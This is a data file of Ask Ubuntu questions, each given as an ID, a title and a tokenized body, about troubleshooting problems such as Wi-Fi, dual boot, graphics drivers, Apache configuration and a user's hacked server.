407421	i am using ubuntu 13.10 and i can not access some website . my internet is wired ( dsl )	i have some problem for quite some time in ubuntu connecting to particular sites like : http : //www.thedailystar.net/ http : //www.ixwebhosting.com/ i have tried various browsers , like firefox , chrome , midori ... none of them can load those websites . i am including my ifconfig and ping of the site . it will be great help if someone can give me the solution to the problem . rashed @ rashed-hp-430-notebook-pc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:9c:02:93 : f2:85 inet6 addr : fe80 : :29c:2ff : fe93 : f285/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:142049 errors:0 dropped:0 overruns:0 frame:0 tx packets:82404 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:97855440 ( 97.8 mb ) tx bytes:10101995 ( 10.1 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8997 errors:0 dropped:0 overruns:0 frame:0 tx packets:8997 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:829610 ( 829.6 kb ) tx bytes:829610 ( 829.6 kb ) ppp0 link encap : point-to-point protocol inet addr:10.70.60.26 p-t-p:10.70.70.1 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:10826 errors:0 dropped:0 overruns:0 frame:0 tx packets:11408 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:6995506 ( 6.9 mb ) tx bytes:2105743 ( 2.1 mb ) rashed @ rashed-hp-430-notebook-pc : ~ $ ping www.thedailystar.net ping iu72u.x.incapdns.net ( 199.83.133.234 ) 56 ( 84 ) bytes of data . 64 bytes from 199.83.133.234.ip.incapdns.net ( 199.83.133.234 ) : icmp_req=1 ttl=52 time=325 ms 64 bytes from 199.83.133.234.ip.incapdns.net ( 199.83.133.234 ) : icmp_req=2 ttl=52 time=325 ms 64 bytes from 199.83.133.234.ip.incapdns.net ( 199.83.133.234 ) : icmp_req=3 ttl=52 time=312 ms rashed @ rashed-hp-430-notebook-pc : ~ $ ping www.ixwebhosting.com ping www.ixwebhosting.com ( 98.130.254.120 ) 56 ( 84 ) bytes of data . 64 bytes from www.ixwebhosting.com ( 98.130.254.120 ) : icmp_req=1 ttl=47 time=340 ms 64 bytes from www.ixwebhosting.com ( 98.130.254.120 ) : icmp_req=2 ttl=47 time=341 ms 64 bytes from www.ixwebhosting.com ( 98.130.254.120 ) : icmp_req=3 ttl=47 time=342 ms
407426	unable to boot to windows 8	i have a laptop that came with windows 8 preinstalled , on which i installed ubuntu alongside windows 8 . it was successfully installed and when i restart it and select ubuntu it boots to ubuntu and works ok , but when i restart it and try to select windows 8 it gives me this error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator it computer manufacturer for assistance . file : \boot\bcd status : 0xc000000c info : the application or operating system could n't be loaded because a required file is missing or contains errors .
407429	how can i fix the wifi connection for ubuntu 12.04 ?	my wifi connection is gone , but i got ethernet . could it be the wireless adapter , i had the similar problem with the erased windows 7 , but the wireless usb adapter what i used does n't work for ubuntu . i got acer extensa 4420 ... any ideas ?
407430	nvidia 331 with kernel 3.13	nvidia 331.20 or nvidia 331.38 xorg edgers not working with ubuntu 14.04lts with kernel 3.13 , x crashs when loading , how i resolve this ? system : asus k56cb intel 4000/nvidia 740m nvidia_prime 0.5.3 install with kernel 3.12 works any solutions ?
407433	how to start internet in ubuntu using huwaei modem ?	i have installed ndis driver in my ubuntu machine , but after that mobile broadband option was gone , so how can i start internet on my ubuntu 13.04 machine ?
407437	flickering dashes upon boot and then logged out and possibly xorg.conf	recently , upon booting ubuntu 12.04 , i 'll see flickering dashes at the top of the screen and then as soon as i try to use an application , ubuntu will log me out . upon logging myself back in everything works fine . i do n't know why this is , but i 'm wondering if it could have something to do with having mucked about in the xorg.conf file . i am unable to change the brightness settings on my toshiba satellite l755 and i followed this post about how to correct the problem ( with no success ) : unable to change brightness on a toshiba l750 after editing my xorg.conf file my machine would n't boot . i had to boot into terminal and remove the lines that i added manually . unfortunately , i did n't save a backup of the file . my file looks like this ( with a blank line at the top ) : section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection does it seem likely that my problem is related to having fiddled with xorg.conf ? if not , how should i begin to diagnose the problem ? if so , how should i go about fixing this file ( i no longer have a clean backup ) ? your help is much appreciated as i am new to ubuntu .
407439	is there any app for lubuntu which has ability to remotely turn on the pc and use it and then tun it off also	is there any app for lubuntu which has ability to remotely turn on the pc and use it and then tun it off also . i want it as my computer is in newyork and i want to access some files in my office at canada . then how can i remotely tun on that pc and download some files . ( the pc is always plugged in to mains but not turned on as it will waste electricity )
407441	can i install openstack cloud software on my ubuntu 12.04 lts machine ?	i want to install openstack cloud software on my ubuntu 12.04 lts machine . help needed .
407443	what do these google chrome crash reports mean ?	i 've been experiencing crashes from google chrome , including application crashes , pepperflash crashes , and the `` aw snap '' page . i have some reports from the terminal , but i have no idea what they mean . any help ? [ 2651:2680:0118/123146 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2651:2672:0118/123147 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2651:2672:0118/123150 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2651:2672:0118/123221 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) -- 2014-01-18 12:40:01 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... 2607 : f8b0:4009:804 : :1005 , 173.194.46.78 , 173.194.46.69 , ... connecting to clients2.google.com ( clients2.google.com ) |2607 : f8b0:4009:804 : :1005|:443 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/dev/fd/3' [ < = > ] 16 -- .-k/s in 0s crash dump id : 2014-01-18 12:40:02 ( 3.20 mb/s ) - `/dev/fd/3 ' saved [ 16 ] f796da63569f608e and [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed [ 2776:2806:0115/222154 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222155 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222159 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222232 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222304 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222306 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222338 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) -- 2014-01-15 22:25:15 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... 2607 : f8b0:4009:805 : :1002 , 173.194.46.35 , 173.194.46.36 , ... connecting to clients2.google.com ( clients2.google.com ) |2607 : f8b0:4009:805 : :1002|:443 ... connected . -- 2014-01-15 22:25:15 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... 2607 : f8b0:4009:800 : :1004 , 173.194.46.105 , 173.194.46.98 , ... connecting to clients2.google.com ( clients2.google.com ) |2607 : f8b0:4009:800 : :1004|:443 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/dev/fd/3' [ < = > ] 16 -- .-k/s in 0s crash dump id : 2014-01-15 22:25:15 ( 2.64 mb/s ) - `/dev/fd/3 ' saved [ 16 ] 522ddaaef09bbd7e http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/dev/fd/3' [ < = > ] 16 -- .-k/s in 0s crash dump id : 2014-01-15 22:25:16 ( 2.77 mb/s ) - `/dev/fd/3 ' saved [ 16 ] 6012058ed199d1f8
407445	13.10 installation does not complete	i 'm trying to install 13.10 on a hp dv6 laptop from a dvd . i boot from the dvd , select install ubuntu , select install inside windows 7 , then connect to internet so it can download updates , then i click continue and it reboots and i 'm back booting from the dvd again , and it starts all over . at first i thought this was part of the install process , but it just goes through the same menus again . then i thought maybe if i pop out the disk with it reboots , but then it just boots to windows . : ( any help would be appreciated !
407447	unlock keyring popup after upgrade	ever since i upgraded to ubuntu 13.10 , i get a dialog box asking me for my password to unlock my login keyring , every time i boot up . this never happened before the upgrade . is this bug ? is there a fix for this ?
407450	open magnet links from chrome into ktorrent	i 'm trying to open magnet links from chrome into ktorrent 4.3.1 on kubuntu 13.10 . the problem is that after i click the link , a new notification appears . it says `` examining magnet : // ... '' and will run forever without any result . i can stop the examination manually but it does n't change anything . the link wo n't get into ktorrent . i followed this guide : http : //askubuntu.com/a/133693/128252 , but it did n't change anything .
407456	a wireless usb receiver that works out of the box on ubuntu	i have a desktop computer with no wired internet access ; however , i do have access to a wireless connection . i am running ubunt 13.10 . i do not have a builtin wireless on this desktop , so i am trying out various usb wireless receivers . none of them work . i have been to https : //help.ubuntu.com/community/wifidocs/wirelesscardssupported one thing i found , is that many of the wireless usb receivers ( especially produced after 2008 -- and thus the ones i can find at stores ) require ndiswrapper . however , i get the fatal : module not found error when trying to use ndiswrapper . the fix for this is to install all the packages needed for dkms , and install this way . however , this requires gcc , and a decent chain of dependencies -- some of which are unsatisfiable because of dependency issues in version numbers between the installed system and ( i copied the .deb files to a thumb drive at a friend 's place and tried to install them with dpkg ) . i also found that , annoyingly , the naming of the wireless cards is a bit misleading . for example , on the compatibility report , netgear : wnda3100 v1 is listed as working out of the box . however , in the store ( best-buy ) , looking at the box , there is only the number wnda3100 on the back of the box . it was n't until i got home , and tried it until i realized ( via lsusb ) that it is wdna3100 v2 . and it does n't work . in fact it is another one that works only with ndiswrapper , and even at that , does n't work very well apparently . so i have tried pretty much every card at best-buy now . none of them work . so my question is currently , what are my options ? has anyone had success recently purchasing a wireless usb receiver that works out of the box ? if so please tell me what product , and where i can find it . thank you .
407457	help ! my server has been hacked - .iptables and .iptablex in /boot	i 'm running a ubuntu 6.06 dapper server and it has been hacked . i 'll admit up front here that i 'm a programmer and not a system administrator so even though i 've worked with unix/linux for years my skills as a sysadmin are extremely weak . i host a website that is running apache 2 and tomcat to serve up a java based struts web application . the performance of the site was getting really bad and after poking around trying to understand what the problem might be i discovered that a temp directory in my home directory was getting filled with files called getsetup.hb . * this was new so i dug around a little more and found by running ps -ef that there were a couple of processes running that i was n't aware of and looked a little strange to me , /boot/.iptables and /boot/.iptablex i searched the web for a clue as to what these files were and tried running netstat to see what foreign hosts were connected . both .iptables and .iptablex were connected to ip addresses that belonged to china telecom . this was a shock to me because i had the iptables firewall software configured so it would only allow connections to the web server on port 80 and ssh on port 22 was limited to a static ip i use at home so i can access the server remotely . i killed the processes , removed the files from the /boot directory and also found copies in the root and in /usr which i removed . i also changed the root password . logging in again today i see the files are all back again and the connection to the china telecom ip 's have been re-established . i have no idea how to proceed here . please forgive my ignorance but i 'm hoping someone can direct me as to how to proceed from here to get this resolved . any suggestions are welcome . thanks in advance . mike
407460	error : operating system not found after installing 13.10	so here 's the story : i have a vaio fit 15e ( full spec : svf15218gb ) which has restricted boot enabled by default ! i mounted the iso file of ubuntu 13.10 on a flash drive and tried restarting the system but nothing happened and windows 8 started as usual ! then i went through bios settings and turned off the uefi and switched it to legacy ! finally i could manage to install 13.10 `` alongside windows 8 '' and restarted the system and removed the flash drive , but nothing came up ! neither ubuntu nor windows 8 ! instead an error showed up : '' operating system not found ! '' what i did was turning off the system and enabled the uefi back . system started normally and booted windows 8 as usual , as nothing else is on the machine ! i remember installing ubuntu alongside windows 8 on a pc before which it showed me a screen with the options of windows 8 or ubuntu ( grub ? gurb ? or something ? ) ! but now on my vaio , it 's a little complicated i think ! any ideas how i can dual boot windows 8 and ubuntu ?
407463	virtual desktop not working	i am running 12.04 , with two user accounts set up . these both have the same access permissions . when i use my account , the virtual desktop works as expected and i can switch around between four applications . on the other account ( which is actually for the initial user , ) i can open applications from the launcher and move them around as expected . when i then click to show all four desktops , the selected applications are all crammed into the top left-hand corner and ca n't be moved into the required quadrants . any suggestions to fix this will be much appreciated . as simple as possible as i am new to ubuntu . thanks in anticipation , keith
407465	how a tmp folder set on a mounted folder from another ntfs drive does can report free space from that drive to audacity ?	i have set the tmp folder for audacity on a mounted folder from a target ntfs drive . but i 've seen that audacity does not see the free space from that ntfs drive but instead the free space from the host drive . my questions are : - this is an audacity issue ? - it is a matter of difference between host drive fs type ( ext4 ) and target drive fs type ( ntfs ) that can not be surpassed ? - if the response for my previous questions are not true , how that folder can be mounted to allow audacity to see the free space from the ntfs drive ? it 's this even possible ?
407466	ubuntu one-related question - how to share files securely ?	i have procrastinated this question a lot because i know it is a complex and a `` crossover '' . that 's why i have hesitated if to ask it here , on ask ubuntu , or somewhere else , let 's say , freelancer or workspace . but , i have decided in the end , i need technical solutions to my socio-professional problems . so , let 's get to the point . i 've been working as an online shop administrator for my former boss . but , till now i was paid only with praises and thanks . when i have explicitly asked for my money , i was asked to give detailed `` proofs '' of my work . giving the fact that , at the beginning of our collaboration , my ex-boss told me that he knows everything i do online , i find it very weird to be asked right now for `` proofs '' . so , i believe now this is only one of his tactics to delay my payment or even to discourage me . anyway , luckily , i had the inspiration to install ubuntu one and to synchronise my work folder . so , theoretically , i have most of my `` evidence '' online and i can send him the link to see it . but here is the hard part , and here i need your answer and advice . i am new in this linux world and i had a lot of headache to make ubuntu one work ( and i still ca n't make the right-click menu work all the time ) . and i am hesitant about sharing my precious work files to a person that might try to erase or alter them . giving these facts , here are my worries and questions : how can i share my folder ( and its files and sub-folders ) to my former boss in such a way that he can not alter them ? does ubuntu one show ( to the person i share with ) the hour and date of the synchronisation ( or when i have uploaded the file online ) ? does ubuntu one have any bugs related to synchronisation ? if so , how can i fix this ? i mean that , long after synchronising ( or directly uploading ) a file/folder , i saw a message in the right-top part of the screen saying something like that `` file blablah.jpg it is uploaded '' . how can taht be ? i mean , if i synchronise file blablah.jpg on 1 september , how can i see the message about its synchronisation on 5 or 10 or 12 september ? should n't it happen instantly ? how does it affects the date shown online ? i need the read time dates to be shown , in order to convince my boss that my work was real . ( and if i ca n't convince him , i need to convince the authorities if it is necessarily to go my issue further ) . what other security advices can you give me related to ubuntu one ? please , excuse the complexity of my question , but i really need an answer so i can then answer to my ex-boss . i also intend to continue to use ubuntu one at work to upload my important files . if my question is not clear enough , please , do ask me for further details . i look forward for your answers as i think they will be helpful for other newbies too .
407468	( initramfs ) unable to find a medium containing a live file system basic q	very new to ubuntu & not linux savvy . i have the same 'unable to find a live medium ... ' issue as noted here `` http : //ubuntuforums.org/showthread.php ? t=2185752 '' here . i was trying to install on a 2 year old dell inspiron 1545 . background - got a new machine , the dell was slow and windows would frequently give me a smart drive warning . i figured it was time to wipe off windows and go with ubuntu as a web browser . currently , i 'm checking the disk and doing a system restore for windows first on that old machine ( it 's taking a few hours ) . meantime , i want to check the dvd i burned ( using the other , new machine-windows 8 , blech ) . however , i 'm so new to this i 'm lost even with md5sum . i was unable to check the burned dvd from the command prompt . i 'd type cd d : \ and the screen would show `` d : \ '' and then take me back to the command prompt . so , um , help !
407474	will lts releases continue to have old binaries and libraries after its end of life ?	this pertains to ubuntu 12.04 lts . when php 5.3 goes end-of-life later this year , will ubuntu 12.04 continue with php 5.3 ( with backported security fixes ? ) or will there be a move to php 5.4 ?
407481	wired network is not recognising in my linux 12.04lts	i recently tried to connect with wired internet , but it is not working till now.the cable is working on all other operating systems except linux .
407482	amule ed2k link for ubuntu releases ?	why there is not any ed2k link to download ubuntu.iso image in ubuntu.com ? i know that there is other programs like torrent , jidgo etc . amule is another one why not ?
407484	which program handles the screen backlight in 13.10 ?	what is the name of the program that handles the screen backlight in laptops in 13.10 ? where are the settings for that program ? i need to switch the brightness file that it uses . i have 3 brightness files in my laptop : /sys/class/backlight/acpi_video0/brightness /sys/class/backlight/acpi_video1/brightness /sys/class/backlight/intel_backlight/brightness aparantely only echoing values in inter_backlight has got any effect and ubuntu probably writes values into the wrong file . the weird thing is that it used to work yesterday and i have n't done any upgrades to my system since then . i added xorg edgers ppa two days ago but iirc brightness control worked fine after adding the ppa .
407485	wi fi issue even after upgrading to 13.10	wi fi issue facing from ubuntu 13.04 . while trying to connect to wifi the system either gets hanged or enters into terminal mode and freezes . so tried upgrading to ubuntu 13.10 ... now able to connect to the specified wi fi network but there is no internet connectivity as web-pages are not loading
407489	could someone explain to me in simple terms how to install this specific java platform ?	i am in no way adept with ubuntu . i 've installed it on my samsung chromebook in order to play minecraft , but every version of flash i 've tried will not work . i figured it was because i needed this specific version installed found here it 's the first one called linux arm v6/v7 hard float abi . it 's a .tar.gz , which i have extracted , but do n't know where to go from there .
407490	ubuntu 13.10 stops responding	i 'm using ubuntu one my laptop for over a half of year now and i upgraded it to 13.10 a month ago . it did n't have any major problems before . but today after few hours of work it stopped responding completly and i had to restart it . i logged on and about minute later it freezed again . now it happens every time laptop boots up . keyboard and mouse does n't work either .
407497	can not change keyboard layout after uninstalling unity	i have been messing around with my fairly new installation of ubuntu 13.10 gnome , where i installed two keyboard layouts - english ( uk ) and russian . they worked well , i could switch them with the quirky super+space combination , but up until the point i tried to run unity alongside gnome . mind you , it worked ( kind of ) - i got the unity dock etc , but only on the root account . but then i changed my mind . i did n't want unity , after all . i uninstalled it by typing sudo apt-get remove -- purge unity and sudo apt-get remove -- purge ubuntu-desktop , which , as i have later found out , uninstalled nautilus and other useful things . i had to do a lot of rebooting and reconfiguring ( so much that i ca n't remember ) to make things work again , and when i needed the russian keyboard , i found out that i could n't change to it . i can assure you , i have tried everything in the keyboard settings , and i followed a few ask ubuntu threads - here and here . all of this did n't help me . i also tried editing the /etc/default/keyboard file , but that did n't help either . now i 'm stuck with the english default keyboard , even if i try to remove it through the keyboard settings gui and change it to russian , i still type in latin alphabet . p.s . i later found out that changing keyboard layouts works if i login as root , and that changing the system language to russian works too , but does not affect my keyboard setup .
407500	android sdk manager not opening	i downloaded and installed the android sdk adt bundle from the official website . when i want to start the sdk manager a window appears : initializing ... the sdk manager will show up shortly then the window disappears and nothing happens . no error messages , nothing . i tried also with installing eclipse and then adding the android sdk , but the same thing happens . could someone help me ? i have ubuntu 13.10
407504	browser or apache2 does not see files : âserver software is running but no content has been addedâ	after opening http 127.0.0.1 in the browser it displays info : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . the point is i have added files to the documentroot catalog things i changed : /etc/apache2/envvars from export apache_run_user=www-data export apache_run_group=www-data to export apache_run_user=chiny export apache_run_group=chiny file /etc/apache2/sites-enabled/000-default.conf looks : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /home/chiny/pulpit/lab < directory /home/chiny/pulpit/lab/ > options indexes followsymlinks multiviews allowoverride none require all granted allow from all < /directory > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet my documentroot where i have my html files root @ chiny-hp-compaq-dc7100-cmt-dx438av : /home/chiny/pulpit/lab # ls -l /home/chiny/pulpit/lab razem 60 -rwxrwxr-x 1 chiny chiny 3096 sty 18 2013 10.html -rwxrwxr-x 1 chiny chiny 2562 sty 18 2013 11.html -rwxrwxr-x 1 chiny chiny 3010 sty 18 2013 12.html -rwxrwxr-x 1 chiny chiny 3045 sty 18 2013 1.html -rwxrwxr-x 1 chiny chiny 3016 sty 18 2013 2.html -rwxrwxr-x 1 chiny chiny 2772 sty 18 2013 3.html -rwxrwxr-x 1 chiny chiny 2814 sty 18 2013 4.html -rwxrwxr-x 1 chiny chiny 2638 sty 18 2013 5.html -rwxrwxr-x 1 chiny chiny 2794 sty 18 2013 6.html -rwxrwxr-x 1 chiny chiny 2722 sty 18 2013 7.html -rwxrwxr-x 1 chiny chiny 2591 sty 18 2013 8.html -rwxrwxr-x 1 chiny chiny 2620 sty 18 2013 9.html -rw-r -- r -- 1 chiny chiny 177 sty 18 18:37 index.html -rwxrwxr-x 1 chiny chiny 0 sty 18 14:43 plik -rwxrwxr-x 1 chiny chiny 1711 sty 17 2013 styles.css -rwxrwxr-x 1 chiny chiny 3181 sty 17 2013 w3schoolslogo.gif also /home/chiny/pulpit/lab is owned and group by chiny drwxrwsr-x 2 chiny chiny 4096 sty 18 18:37 lab nothing changed in apache2.conf after restarting apache this info : root @ chiny-hp-compaq-dc7100-cmt-dx438av : /home/chiny/pulpit # /etc/init.d/apache2 restart * restarting web server apache2 ah00557 : apache2 : apr_sockaddr_info_get ( ) failed for chiny-hp-compaq-dc7100-cmt-dx438av ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 . set the 'servername ' directive globally to suppress this message
407507	how can i use waves maxxaudio ? ( dell xps 15 l502x )	i have a dell xps 15 l502x and i installed ubuntu 13.10 . i did n't have any problems with the installation , but when everything 's was ready , the sound was n't good . this laptop has a jbl waves maxxaudio , with a subwoofer ( the sound is very good on windows ) and on windows , there 's a software , and this software makes the sound good . i already serch on dell 's website , but they only have drivers for windows . is there any possibility of the sound be on ubuntu ? if it does n't , i 'll have to come back to windows , and i do n't want that . : / ps : sorry for any bad english , i 'm from brazil . ps2 : i 'm new on ubuntu/linux , i do n't know a lot . thanks ! **** lista de dispositivos playback hardware **** placa 0 : pch [ hda intel pch ] , dispositivo 0 : alc665 analog [ alc665 analog ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 0 : pch [ hda intel pch ] , dispositivo 1 : alc665 digital [ alc665 digital ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 0 : pch [ hda intel pch ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 it 's in portuguese : dispositivo : device , lista de dispositivos : list of devices , secundário : secondary .
407512	how to find the best driver for my ati graphics card ?	i 'm trying to find the best graphics card for my ati radeon hd 7730m card ( my machine has hybrid graphics , should i worry about installing a suitable driver for the intel vga too ? ) because i 'm having a bad experience with the open source version . it 's like lots of crossing lines appear for a very fast glimpse and then disappear instantly without a trace . it 's nothing big , but it 's not usual nor acceptable . this happens randomly , every few minutes . here is as much information i could gather about my vga card by running the following commands : $ sudo lshw ( only relevant information is listed here ) : *-display description : vga compatible controller product : chelsea lp [ radeon hd 7730m ] vendor : advanced micro devices , inc. [ amd/ati ] bus info : pci @ 0000:01:00.0 version : 00 clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 $ xorg -version x.org x server 1.14.5 release date : 2013-12-12 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux mg-7520se 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.11.0-15-generic.efi.signed root=uuid=fdebe919-101f-4bc7-84c1-f209c05c18c8 ro quiet splash acpi_osi=linux acpi_backlight=vendor quiet splash vt.handoff=7 build date : 17 december 2013 10:06:15am xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . $ lspci -nnk 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] chelsea lp [ radeon hd 7730m ] [ 1002:682f ] subsystem : dell device [ 1028:0572 ] kernel driver in use : radeon man radeon ( i ca n't find my card listed anywhere ! ) supported hardware the radeon driver supports pci , agp , and pcie video cards based on the following ati/amd chips ( note : list is non-exhaustive ) : r100 radeon 7200 rv100 radeon 7000 ( ve ) , m6 , rn50/es1000 rs100 radeon igp320 ( m ) rv200 radeon 7500 , m7 , firegl 7800 rs200 radeon igp330 ( m ) /igp340 ( m ) rs250 radeon mobility 7000 igp r200 radeon 8500 , 9100 , firegl 8800/8700 rv250 radeon 9000pro/9000 , m9 rv280 radeon 9200pro/9200/9200se/9250 , m9+ rs300 radeon 9100 igp rs350 radeon 9200 igp rs400/rs480 radeon xpress 200 ( m ) /1100 igp r300 radeon 9700pro/9700/9500pro/9500/9600tx , firegl x1/z1 r350 radeon 9800pro/9800se/9800 , firegl x2 r360 radeon 9800xt rv350 radeon 9600pro/9600se/9600/9550 , m10/m11 , firegl t2 rv360 rv370 radeon x300 , m22 rv380 rv410 radeon x700 , m26 pcie r420 r423/r430 radeon x800 , m28 pcie r480/r481 rv505/rv515/rv516/rv550 radeon x1300/x1400/x1500/x1550/x2300 r520 rv530/rv560 radeon x1600/x1650/x1700 rv570/r580 rs600/rs690/rs740 radeon x1200/x1250/x2100 r600 rv610/rv630 radeon hd 2400/2600/2700/4200/4225/4250 rv620/rv635 radeon hd 3410/3430/3450/3470/3650/3670 rv670 rs780/rs880 radeon hd 3100/3200/3300/4100/4200/4250/4290 rv710/rv730 rv740/rv770/rv790 cedar radeon hd 5430/5450/6330/6350/6370 redwood juniper radeon hd 5750/5770/5830/5850/5870/6750/6770/6830/6850/6870 cypress hemlock radeon hd 5970 palm radeon hd 6310/6250 sumo/sumo2 radeon hd 6370/6380/6410/6480/6520/6530/6550/6620 barts radeon hd 6790/6850/6870/6950/6970/6990 turks radeon hd 6570/6630/6650/6670/6730/6750/6770 caicos radeon hd 6430/6450/6470/6490 cayman radeon hd 6950/6970/6990 aruba radeon hd 7000 series tahiti radeon hd 7900 series pitcairn radeon hd 7800 series verde radeon hd 7700 series oland radeon hd 8000 series hainan radeon hd 8000 series bonaire radeon hd 7790 series kaveri kaveri apus kabini kabini apus now as far as i could get , fglrx stable version of the driver supports only up to version 1.13 of xserver and i 'm running 1.14 , so i 'm trying to use the open-source one instead . i opened the system 's settings dialog , opened the `` software & updates '' dialog from there and switched to the `` additional drivers '' tab , where i confirmed that i 'm using the open source version of ati drivers . i suppose their website is this one . now the latest version on the mentioned site is 7 . how can i verify that i 'm using the latest version ? based on this answer , i installed the ppa repository for the open source driver and ran sudo apt-get update & & sudo apt-get upgrade , but nothing was downloaded . so i 'm supposedly running the latest version , so how can i verify that ?
407514	nitrogen is not setting the wallpaper when i start i3	nitrogen is not starting on start of i3 , i do n't know why . felipe @ ubuntu : ~ $ cat .xinitrc # ! /usr/bin/env bash exec i3 exec nitrogen -- no-startup-id -- restore here is the config felipe @ ubuntu : ~ $ cat .config/nitrogen/bg-saved.cfg [ :0.0 ] file=/home/felipe/imรกgenes/images-wallpaper-comics-87590.jpg mode=4 bgcolor= # 000000 here is the other felipe @ ubuntu : ~ $ cat .config/nitrogen/nitrogen.cfg [ geometry ] posx=0 posy=18 sizex=1916 sizey=1041 [ nitrogen ] view=icon icon_caps=false dirs=/home/felipe/imรกgenes ; i start i3 from lightdm
407515	touchpad backlash	i am running ubuntu 13.04 on a dell inspiron 17r se . it has an alps touchpad . the problem is that this touchpad has backlash . by this i mean that if i move the cursor in one direction and then reverse it , i will have to move my finger a short distance before it starts moving again . i have also noticed this behavior on a fujitsu lifebook with ubuntu 13.10 . the experience is very similar to the mechanical phenomenon that is nicely explained in this wikipedia article . has anyone else experienced this ? is it a flaw in the hardware or something that could be debugged and corrected in software ?
407516	simple bash script does not want to start at reboot	i 've build a play framework application ( cool java/scala web framework ) and would like to start it automatically like apache2 or mysql server . for this i wrote a simple bash script and did chmod +x on it , put it in /etc/init.d/ and it works fine when i call it manually in the shell . the bash script is : # ! /bin/bash . /home/cc/desktop/java/playmulti/playstart this calls the following script : # ! /bin/bash ( play start & ) the play start starts the play framework application in /home/cc/desktop/java/playmulti/ . also i did ls -s and tried to put in different /etc/rcx.d/ directories . i even used update-rc.d to put it there , but nothing i try seems to work . script does n't start with the reboot : / any suggestions are highly appreciated !
407520	strange terminal navigation when logged in as new user	i am not even sure how to ask this properly.. i am using ec2 ubuntu 12.04 i added a new user sudo useradd -g admin admin sudo adduser admin sudo changed shudders so i can use new user without password then did this : sudo useradd -g admin admin sudo adduser admin sudo sudo su admin cd ~ sudo mkdir .ssh sudo cp /home/ubuntu/.ssh/authorized_keys /home/admin/.ssh sudo chown admin : admin /home/admin/.ssh/authorized_keys now when i ssh in as admin i get strange terminal behavior : 1 ) i ca n't ls 2 ) pressing arrow up results in ^ [ [ a how can i fix it and why it happened ? ? thank you .
